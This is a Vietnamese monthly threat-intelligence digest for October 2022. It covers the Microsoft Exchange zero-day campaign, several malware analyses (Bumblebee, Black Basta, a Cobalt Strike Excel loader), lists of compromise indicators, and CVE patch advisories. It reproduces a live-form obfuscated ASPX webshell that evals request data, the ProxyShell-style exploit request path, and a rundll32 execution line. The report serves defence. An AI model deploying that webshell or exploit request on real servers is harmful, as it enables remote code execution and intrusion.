THÔNG TIN CÁC MỐI ĐE DỌA BẢO MẬT TRONG THÁNG 10 – 2022

Hàng tháng, Chúng tôi – NCS tổng hợp lại các thông tin về bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài tổng hợp.

 

1       Các mối đe dọa nâng cao – Advanced Threats

1.1      Chiến Dịch Tấn Công Sử Dụng Lỗ Hổng Zero Day Trên Microsoft Exchange Server

Ngày 28/09, Nhóm nghiên cứu của NCS đã cảnh báo về một chiến dịch tấn công mới sử dụng lỗ hổng Zero-Day trên Microsoft Exchage Server. Khoảng từ đầu tháng 08/2022, đội ngũ giám sát an ninh mạng và xử lý sự cố của NCS SOC đã phát hiện một số tổ chức tại Việt Nam bị tấn công an ninh mạng bắt nguồn từ hệ thống Microsoft Exchange Server.

Kẻ tấn công đã sử dụng một lỗ hổng bảo mật của Microsoft Exchange chưa từng được công bố – hay còn gọi là lỗ hổng 0-day. Dựa trên log IIS, các request exploit có định dạng giống như lỗ hổng ProxyShell:

autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com.

Đội ngũ Redteam của NCS đã tiến hành nghiên cứu và tìm ra cách sử dụng đường dẫn trên để truy cập tới 1 component ở backend và thực hiện RCE. Thông tin kỹ thuật chi tiết về lỗ hổng tại thời điểm này chúng tôi xin phép chưa công bố.

Trên máy chủ Exchange phát hiện các webshell được obfuscated. Thông qua User-agent chúng tôi phát hiện attacker sử dụng Antsword (một opensource có tính năng hỗ trợ quản lý webshell).

<%@Page Language=”Jscript”%>

<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘NTcyM’+’jk3O3’+’ZhciB’+’zYWZl’+”+’P’+’S’+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘MQ==’))+char(51450/525)+”+”+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘Wg==’))+’m’+”+’UiO2V’+’2YWwo’+’UmVxd’+’WVzdC’+’5JdGV’+’tWydF’+’WjBXS’+’WFtRG’+’Z6bU8’+’xajhk’+’J10sI’+’HNhZm’+’UpOzE’+’3MTY4’+’OTE7’+”)));%>

NCS nghi ngờ các hành vi khai thác này xuất phát từ các nhóm tấn công Trung Quốc, dựa trên codepage trong webshell là 936, một bảng mã ký tự Microsoft cho tiếng Trung giản thể (simplified Chinese).

Một đặc điểm đáng chú ý khác, bên cạnh việc drop các webshell mới hacker cũng thực hiện thay đổi nội dung trong file RedirSuiteServiceProxy.aspx thành nội dung webshell. RedirSuiteServiceProxy.aspx là một tên file hợp pháp sẵn có trong máy chủ Exchange.

Microsoft đã định danh cho 2 lỗ hổng 0-day này lần lượt là CVE-2022-41040 (SSRF) và CVE-2022-41082 (RCE). Đồng thời, Microsoft  cung cấp các biện pháp giảm thiểu đối với lỗ hổng này. https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/

ATT&CK MATRIX

TACTIC TECHNIQUE NAME
Resource Development T1586.002 Compromise Accounts: Email Accounts
Execution T1059.003 Command and Scripting Interpreter: Windows Command Shell
Execution T1047 Windows Management Instrumentation
Persistence T1505.003 Server Software Component: Web Shell
Defense Evasion T1070.004 Indicator Removal on Host: File Deletion
Defense Evasion T1036.005 Masquerading: Match Legitimate Name or Location
Defense Evasion T1620 Reflective Code Loading
Credential Access T1003.001 OS Credential Dumping: LSASS Memory
Discovery T1087 Account Discovery
Discovery T1083 File and Directory Discovery
Discovery T1057 Process Discovery
Discovery T1049 System Network Connections Discovery
Lateral Movement T1570 Lateral Tool Transfer
Collection T1560.001 Archive Collected Data: Archive via Utility

Indicators of Compromise (IoCs)

Files / hash SHA 256

c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1

65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5

b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca

c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1

be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257

074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82

45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9

9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0

29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3

c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2

76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e

C2 Domain

125[.]212[.]220[.]48

5[.]180[.]61[.]17

47[.]242[.]39[.]92

61[.]244[.]94[.]85

86[.]48[.]6[.]69

86[.]48[.]12[.]64

94[.]140[.]8[.]48

94[.]140[.]8[.]113

103[.]9[.]76[.]208

103[.]9[.]76[.]211

104[.]244[.]79[.]6

112[.]118[.]48[.]186

122[.]155[.]174[.]188

125[.]212[.]241[.]134

185[.]220[.]101[.]182

194[.]150[.]167[.]88

212[.]119[.]34[.]11

 

Nguồn: https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html

1.2     Phát Hiện Chiến Dịch Cryptojacking Sử Dụng Side-Loading Onedrive

Ngày 05/10, nhóm nghiên cứu của Bitdefender đã thông báo về một chiến dịch tấn công tiền điện tử (Cryptojacking) mà kẻ tấn công đã khai thác lỗ hổng DLL Side-Loading trên ứng dụng OneDrive của Microsoft.

Trong khoảng thời gian từ ngày 1 tháng 5 đến ngày 1 tháng 7 năm 2022, Bitdefender đã phát hiện ra các cuộc tấn công tiền điện tử vào khoảng 700 người dùng trên toàn cầu. Kẻ tấn công đã viết một tệp secur32.dll giả mạo vào thư mục “%LocalAppData%\Microsoft\OneDrive\” và được tải bởi một trong các tiến trình OneDrive (OneDrive.exe hoặc OneDriveStandaloneUpdater.exe).

Mặc định, tệp OneDriveStandaloneUpdater.exe được lập lịch chạy hàng ngày, tệp OneDrive.exe được chạy mỗi khi reboot. Điều này giúp cho kẻ tấn công đạt được khả năng duy trì xâm nhập (persistence) bên trong hệ thống của nạn nhân.

Đội ngũ Bitdefender xác nhận bước đầu xâm nhập của kẻ tấn công thông qua phần mềm độc hại được ngụy trang dưới dạng phần mềm hợp pháp (adobe photoshop setup.exe, Free_Macro_V1.3.exe, AppLaunch.exe). Tệp secur32.dll giả mạo sẽ thực hiện tải xuống một phần mềm mã nguồn mở khai thác tiền điện tử và inject nó vào các tiến trình hợp pháp của Windows.

Kẻ tấn công đã sử dụng hai kỹ thuật để tránh bị phát hiện: DLL Side-Loading và Process Hollowing. Đầu tiên là tệp secur32.dll được tải bởi tiến trình của OneDrive thông qua lỗ hổng DLL Side-Loading. Thứ hai là phần mềm khai thác tiền điện tử được chạy bên trong tiến trình svchost.exe hoặc conhost.exe bằng kỹ thuật Process Hollowing. Ngoài ra, phần mềm độc hại cũng che giấu các strings, imports API khiến cho việc phát hiện trở nên khó khăn hơn.

Hình 2.1 Luồng tấn công

ATT&CK MATRIX

TACTIC TECHNIQUE NAME
Execution T1204.002 User Execution: Malicious File
Execution T1106 Native API
Persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Defense Evasion T1574.002 Hijack Execution Flow: DLL Side-Loading
Defense Evasion T1055.012 Process Injection: Process Hollowing
Discovery T1057 Process Discovery
Discovery T1082 System InformationDiscovery
Discovery T1614 System Location Discovery
Command and Control T1071.001 Web Protocols
Impact T1496 Resource Hijacking

Indicators of Compromise (IoCs)

Files / hash MD5

fed6517a5f84eecc29edee5586d7feeb

9b0d09fd16c24a1691fa7e316351399d

9b1c1fd2556275a985bb4ce4aba99975

ec36e1abbf75584a9d0bb4a15f8f2c33

f3af73070387fb75b19286826cc3126c

7de8b8015540bf923385c36f60b9d5ae

656a4c1fcc572e855ac2e512c04ae206

7bbeb20cfcabcfa69d668c24a235082e

7c64bb78b589054079a1048f9fc79708

73cef9a93e9572c148a5785434708c41

7c64bb78b589054079a1048f9fc79708

 

Nguồn: https://www.bitdefender.com/files/News/CaseStudies/study/424/Bitdefender-PR-Whitepaper-SLOneDriveCyberJack-creat6318-en-EN.pdf

1.3     Cobalt Strike Loader Được Phát Tán Thông Qua Tệp Excel Có Chủ Đề Về Quân Sự Ukraina

Ngày 11/10, nhóm nghiên cứu của FortiGuard đã quan sát thấy ngày càng nhiều chiến dịch nhắm vào một trong hai bên của cuộc xung đột Nga-Ukraine đang diễn ra. FortiGuard đã bắt gặp một tài liệu Excel độc hại giả mạo làm công cụ tính lương cho quân nhân Ukraine.

Cuộc tấn công bắt đầu với một tệp Excel được tải với mã macro độc hại (XLSM). Tệp này giả dạng như một công cụ bảng tính để tạo tiền lương cho quân nhân Ukraine. Như thường lệ, tài liệu cố gắng lừa người dùng cho phép thực thi các macro.

Điều đầu tiên cần chú ý khi mở mã VBA là khoảng trắng lớn trước phần bắt đầu của mã, khiến nó thoạt nhìn có vẻ trống rỗng. Cuộn xuống cho thấy hàm độc hại SUMMPROPIS2, được thực thi tự động khi tệp được mở thông qua hàm Workbook_Open () . Ngoài ra, tài liệu cố gắng thực thi chức năng này bằng cách tham chiếu nó từ một số ô, các ô này cũng được kích hoạt khi tệp được mở. Điều này dẫn đến phần mềm độc hại được thực thi nhiều lần sau khi mở.

Mã VBA sử dụng các kỹ thuật xáo trộn đơn giản, bao gồm các hàm và tên biến không thể đọc được để làm chậm quá trình phân tích tĩnh. Ngoài ra, dữ liệu quan trọng được mã hóa dưới dạng chuỗi hex, bao gồm cả tệp nhị phân độc hại được nhúng.

Hình 3.1 Luồng tấn công

Mã VBA thực hiện các chức năng chính sau:

  • Giải mã nhị phân độc hại từ một chuỗi thập lục phân và lưu nó vào %AppData%\Microsoft\fhasbqwn.dll
  • Tạo shortcut (.LNK) với tên %Temp%\jdbsabdqbsmnqwdssad.lnk. Mục tiêu của tệp .LNK là thực thi chức năng đã xuất DllUnregisterServer của DLL độc hại, thường được sử dụng để hủy đăng ký DLL khỏi hệ thống. Tuy nhiên, trường hợp này dẫn đến việc thực thi các chức năng độc hại của DLL (Hình 3.2).

Hình 3.2 Tệp shortcut dẫn đến việc thực thi DLL độc hại

  • Chạy shortcut qua

RunDLL32.EXE shell32.dll, ShellExec_RunDLL %Temp%\jdbsabdqbsmnqwdssad.lnk

Nhiệm vụ cuối cùng của quá trình lây nhiễm là tải và thực thi Cobalt Strike Beacon, một công cụ phổ biến duy trì xâm nhập trước khi triển khai phần mềm độc hại khác trong hệ thống của nạn nhân.

ATT&CK MATRIX

TACTIC TECHNIQUE NAME
Execution T1204.002 User Execution: Malicious File
Execution T1059.005 Command and Scripting Interpreter: Visual Basic
Execution T1106 Native API
Persistence T1053.005 Scheduled Task/Job: Scheduled Task
Defense Evasion T1027 Obfuscated Files or Information
Defense Evasion T1140 Deobfuscate/Decode Files or Information
Defense Evasion T1218.010 System Binary Proxy Execution: Regsvr32
Defense Evasion T1218.011 System Binary Proxy Execution: Rundll32
Defense Evasion T1036.004 Masquerading: Masquerade Task or Service
Defense Evasion T1055.003 Process Injection: Thread Execution Hijacking
Discovery T1057 Process Discovery
Command and Control T1105 Ingress Tool Transfer
Command and Control T1071.001 Web Protocols

Indicators of Compromise (IoCs)

Files / hash SHA256

4cedec3e1a2f72a917ad9a59ebe116ed50c3268567946d1e493c8163486b888b

c0c455cd3e18be14d2e34cf4e3fb98e7ab0a75ef04b6049ff9f7b306d62704b8

2927794d7c550c07303199752b8226f197d7ef497d04cf038859f95b60edc9ce

b03c9f7823810e3eeef3c0b1d6c00da4f16fdc2ced92f97f78e5676d0989d9b3

de8c789ef2e1da81182a7529e7b42adf2984cd6e70b02e60fd770ebe658086ae

C2 Domain

hxxps://ellechina[.]online/01_logo_HLW-300×168[.]jpg

hxxps://pedaily[.]link/daashbooard/managgemment/GCLwJmax/KFKcpjlf

hxxps://pedaily[.]link/daashbooard/managgemment/oknz05PqOlqLtMGB/tzJGhpVp

Nguồnhttps://www.fortinet.com/blog/threat-research/ukrainian-excel-file-delivers-multi-stage-cobalt-strike-loader

2     Malware

2.1     Phân Tích Bumblebee Loader

Bumblebee Loader thông thường là các DLL được đóng gói trong các file định dạng ISO hoặc VHD. Mã độc sẽ kiểm tra môi trường đang chạy để tránh việc thực thi trong môi trường sandbox, các đoạn code trong mã độc được sử dụng từ công cụ mã nguồn mở al-khaser. Sau khi kiểm tra, mã độc tiến hành load cấu hình vào trong bộ nhớ bằng cách trỏ tới phân vùng .data. Nơi lữu trữ khóa RC4(80 bytes đầu tiên) và các dữ liệu sẽ được giải mã bằng khóa RC4 trên. Bumblebee thu thập thông tin bao gồm tên máy và GUUID, nối thành một chuỗi sau đó sử dụng MD5 để tính toán, giá trị này sẽ gắn với client_id. Giá trị client_id cùng một số thông tin khác thu thập từ máy nạn nhân sẽ được Bumblebee xây dựng thành C&C check-in dưới định dạng JSON như sau:

Chuỗi này sẽ được mã hóa bằng thuật toán RC4 với khóa được sử dụng ở cấu hình bên trên và gửi tới C2 server. Các thông tin phản hồi từ phía C2 server cũng được mã bằng cùng một khóa RC4. Dữ liệu từ C2 trả về có thể là null

hoặc payload mới được encode base64 trong trường task_data

Một trong những hoạt động đáng lưu ý khác là Bumblebee sẽ drop các payload phụ thuộc vào tùy từng nạn nhân. Nếu nạn nhân nằm trong WORKGROUP, trong hầu hết các trường hợp, mã độc sẽ sử dụng DEX command (Download and Execute), drop payload mới xuống máy nạn nhân và thực thi. Các payload này thường là các stealer phổ biến như Vidar Stealer hay banking Trojan

Nếu nạn nhân nằm trong domain, DIJ command (Download and Inject) hoặc SHI command (Shellcode and Inject) sẽ được sử dụng. Trong trường hợp này các payload mới thường có thể là CobaltStrike, Sliver hoặc Metepreter.

Indicators of Compromise (IoCs)

Bumblebee samples

c70413851599bbcd9df3ce34cc356b66d10a5cbb2da97b488c1b68894c60ea69

14f04302df7fa49d138c876705303d6991083fd84c59e8a618d6933d50905c61

76e4742d9e7f4fd3a74a98c006dfdce23c2f9434e48809d62772acff169c3549

024f8b16ee749c7bb0d76500ab22aa1418cd8256fb12dcbf18ab248acf45947e

2691858396d4993749fec76ac34cf3cc3658ee3d4eaf9c748e2782cfc994849d

6bc2ab410376c1587717b2293f2f3ce47cb341f4c527a729da28ce00adaaa8db

083a4678c635f5d14ac5b6d15675d2b39f947bb9253be34d0ab0db18d3140f96

21df56d1d4b0a6a54bae3aba7fe15d307bac0e3391625cef9b05dd749cf78c0c

31005979dc726ed1ebfe05558f00c841912ca950dccdcdf73fd2ffbae1f2b97f

2d67a6e6e7f95d3649d4740419f596981a149b500503cbc3fcbeb11684e55218

3c0f67f71e427b24dc77b3dee60b08bfb19012634465115e1a2e7ee5bef16015

ca9da17b4b24bb5b24cc4274cc7040525092dffdaa5922f4a381e5e21ebf33aa

82aab01a3776e83695437f63dacda88a7e382af65af4af1306b5dbddbf34f9eb

a5bcb48c0d29fbe956236107b074e66ffc61900bc5abfb127087bb1f4928615c

07f277c527d707c6138aae2742939e8edc9f700e68c4f50fd3d17fe799641ea8

68ac44d1a9d77c25a97d2c443435459d757136f0d447bfe79027f7ef23a89fce

13c573cad2740d61e676440657b09033a5bec1e96aa1f404eed62ba819858d78

7024ec02c9670d02462764dcf99b9a66b29907eae5462edb7ae974fe2efeebad

ee27cceac88199bf3546e8b187d77509519d6782a0e114fc9cfc11faa2d33cd1

b2c28cdc4468f65e6fe2f5ef3691fa682057ed51c4347ad6b9672a9e19b5565e

Bumblebee C2 servers

104.168.201.219

142.11.234.230

145.239.30.26

145.239.135.155

145.239.28.110

146.19.173.202

146.70.125.122

152.89.247.79

185.17.40.189

185.62.58.175

205.185.122.143

205.185.123.137

209.141.46.50

209.141.58.141

51.210.158.156

51.68.144.94

51.68.145.54

51.68.146.186

51.68.147.233

51.75.62.99

51.83.250.240

51.83.251.245

51.83.253.131

51.83.253.244

54.37.130.166

54.37.131.14

54.38.136.111

54.38.136.187

54.38.138.94

54.38.139.20

Nguồn tham khảo: https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/

2.2    Phân Tích Black Basta Ransomware

Thông qua hình thức phishing như gửi email đính kèm mã độc hay URL độc hại, ransomware sẽ được phát tán tới máy nạn nhân.

Black Basta dropper giả mạo ứng dụng tạo USB boot với đầy đủ chữ ký hợp pháp từ trang web Rufus. Black Basta sử dụng nhiều kỹ thuật lẩn tránh và anti-debug khác nhau như System Flag, CPU registers Timing checks, Libraty checks, Windows API checks, nếu có phát hiện bất kỳ debugger hay môi trường giả lập sandbox nào, dropper sẽ ngừng thực thi Black Basta.

Sau các bước kiểm tra, Black Basta payload sẽ được thực thi, với việc ban đầu là tạo mutex có tên “dsajdhas.0”. Đặt hình nền và gán biểu tượng cho file với phần mở rộng là .basta. Các hình ảnh này được mã độc giải nén ở thư mục TEMP. Mã độc cũng thực hiện xóa các file shadow volume trên máy nạn nhân.

Mã độc sử dụng thuật toán ChaCha20 (được cho là nhanh hơn so với AES) cho quá trình mã hóa với khóa được tạo là ngẫu nhiên cho mỗi file. Sau đó sử dụng tiếp thuật toán RSA, khóa sẽ được nối vào cuối mỗi tệp đã được mã hóa. Mã độc chỉ mã hóa khối thứ 3 với kích thước mỗi khối là 64 bytes mà không mã hóa hết toàn bộ file.

Sau quá trình mã hóa, ransomware sẽ tạo file ransom note có tên “readme.txt” tại Desktop. Giá trị company ID được hardcoded trong binary cho thấy dấu hiệu của một cuộc tấn công có chủ đích

Black Basta cũng có tích năng phát tán mã độc tới các máy khác trong mạng thông qua LDAP API. Sau khi có được danh sách các máy client trong mạng, ransomware sẽ sao chép chính nó tới các máy thông qua đường dẫn \\ c $ \\ Windows \\ tmp.exe. Sử dụng COM object objectIWbemClassObject (CLSID: 4590F812-1D3A-11D0-891F-00AA004B2E24) và WbemServices->Win32_Process, để thực thi ransomware.

Indicators of Compromise (IoCs)

07fdfcde9c9a3f60b1302c6a42ef1191fcfa861e94638968c8023ed957d9144f

5d2204f3a20e163120f52a2e3595db19890050b2faa96c6cba6b094b0a52b0aa

5d2204f3a20e163120f52a2e3595db19890050b2faa96c6cba6b094b0a52b0aa

7883f01096db9bcf090c2317749b6873036c27ba92451b212b8645770e1f0b8a

ae7c868713e1d02b4db60128c651eb1e3f6a33c02544cc4cb57c3aa6c6581b6e

b1773d41cb87d61073f7bb1fc3aca877f01fd64f7b1430666ce3c9bb65ecae70

bc1baf6014affceab4e59a781c33df25f2e9baa17c0cc579f6a6702d0db585d2

e354bf321585aef56829913384ff890deb5836ce1299fb27d7d34b4dab37b937

Nguồn tham khảo: https://research.checkpoint.com/2022/black-basta-and-the-unnoticed-delivery/

3     CVE và các khuyến nghị bảo mật

3.1     Microsoft Patch Tuesday – October 2022

Trong tháng 10, Microsoft đã phát hành các bản vá cho 85 CVE mới trong các sản phẩm của Microsoft Windows và Windows Components; Azure, Azure Arc và Azure DevOps; Microsoft Edge (Chromium-based); Office và Office Components; Visual Studio Code; Active Directory Domain Services và Active Directory Certificate Services; Nu Get Client; Hyper-V và the Windows Resilient File System (ReFS). Trong đó có 15 lỗ hổng được đánh giá mức độ Nghiêm trọng, 69 lỗ hổng được đánh giá là Improtant

Dưới đây là một số CVE nổi bật được đánh giá ở mức độ Critical và Improtant:

3.1.1     CVE-2022-41033 – Windows COM+ Event System Service Elevation of Privilege Vulnerability

CVSS v3: 7.8/10

Mô tả: Lỗ hổng cho phép kẻ tấn công leo thang đặc quyền, thực thi các đoạn mã độc hại bằng quyền SYSTEM. Micrsoft ghi nhận lỗ hổng đang được khai thác bởi các nhóm tấn công.

Phiên bản ảnh hưởng:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows RT 8.1

Windows 8.1 for x64-based systems

Windows 8.1 for 32-bit systems

Windows 7 for x64-based Systems Service Pack 1

Windows 7 for 32-bit Systems Service Pack 1

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows 11 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for ARM64-based Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 for ARM64-based Systems

Windows 11 for x64-based Systems

Windows 10 Version 20H2 for ARM64-based Systems

Windows 10 Version 20H2 for 32-bit Systems

Windows 10 Version 20H2 for x64-based Systems

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows 10 Version 21H1 for 32-bit Systems

Windows 10 Version 21H1 for ARM64-based Systems

Windows 10 Version 21H1 for x64-based Systems

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41033

3.1.2    CVE-2022-37976 – Active Directory Certificate Services Elevation of Privilege Vulnerability

CVSS v3: 8.8/10

Mô tả: Lỗ hổng cho phép kẻ tấn công leo thang đặc quyền, ảnh hưởng đến máy chủ Active Directory có cài đặt ADCS (Active Directory Certificates Service).

Phiên bản ảnh hưởng:

Windows Server 2016

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows Server 2012 R2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37976

3.1.3    CVE-2022-41038 – Microsoft SharePoint Server Remote Code Execution Vulnerability

CVSS v3: 8.8/10

Mô tả: Lỗ hổng cho phép kẻ tấn công thực thi mã từ trên hệ thống bị ảnh hưởng, khai thác lỗ hổng yêu cầu xác thực với quyền sử dụng Manage Lists trong SharePoint.

Phiên bản ảnh hưởng:

Microsoft SharePoint Foundation 2013 Service Pack 1

Microsoft SharePoint Server Subscription Edition

Microsoft SharePoint Server 2019

Microsoft SharePoint Enterprise Server 2013 Service Pack 1

Microsoft SharePoint Enterprise Server 2016

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41038

3.2   Ứng Dụng Web Và Các Sản Phẩm Khác

3.2.1    CVE-2022-42889 – Arbitrary Code Execution in Apache Commons Text

CVSS v3: 9.8/10

Mô tả: Tồn tại lỗ hổng trong class StringSubstitutor thuộc thư viện Apache Commons Text, lỗ hổng cho phép kẻ tấn công thực thi mã từ xa. Hiện tại mã khai thác đã public trên Internet.

Phiên bản ảnh hưởng:

Apache Commons Text phiên bản từ 1.5 đến 1.9

Khuyến nghị: Cài đặt cập nhật bản vá lên phiên bản 1.10 theo hướng dẫn của hãng:

https://commons.apache.org/proper/commons-text/download_text.cgi

3.2.2   CVE-2022-41352 – Zimbra Collaboration Suite TAR Path Traversal

CVSS v3: 9.8/10

Mô tả: Lỗ hổng tồn tại trong một thành phần của Zimbra suite có tên Amavis. Bằng cách gửi email đính kèm với tệp tin độc hại được nén dưới định dạng Tar, khi nhận email Amavis trong Zimbra sẽ xử lý và gọi đến tính năng cpio nhằm trích xuất tệp tin nén. Dẫn đến có thể thực thi mã từ xa.

Khuyến nghị: Cài đặt bản cập nhật theo hướng dẫn của hãng: https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27. Trong trường hợp không thể cập nhật, cài đặt pax trên máy chủ cấu hình Zimbra

3.2.3   CVE-2022-40684 – Fortinet Authentication Bypass Vulnerability

CVSS v3: 9.6/10

Mô tả: Lỗ hổng cho phép kẻ tấn công bỏ qua xác thực truy cập vào hệ thống bị ảnh hưởng .

Phiên bản ảnh hưởng:

FortiOS phiên bản 7.2.0 đến 7.2.1; FortiOS phiên bản 7.0.0 đến 7.0.6;

FortiProxy phiên bản 7.2.0; FortiProxy phiên bản 7.0.0 đến 7.0.6

FortiSwitchManager phiên bản 7.0.0 và 7.2.0

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://www.fortiguard.com/psirt/FG-IR-22-377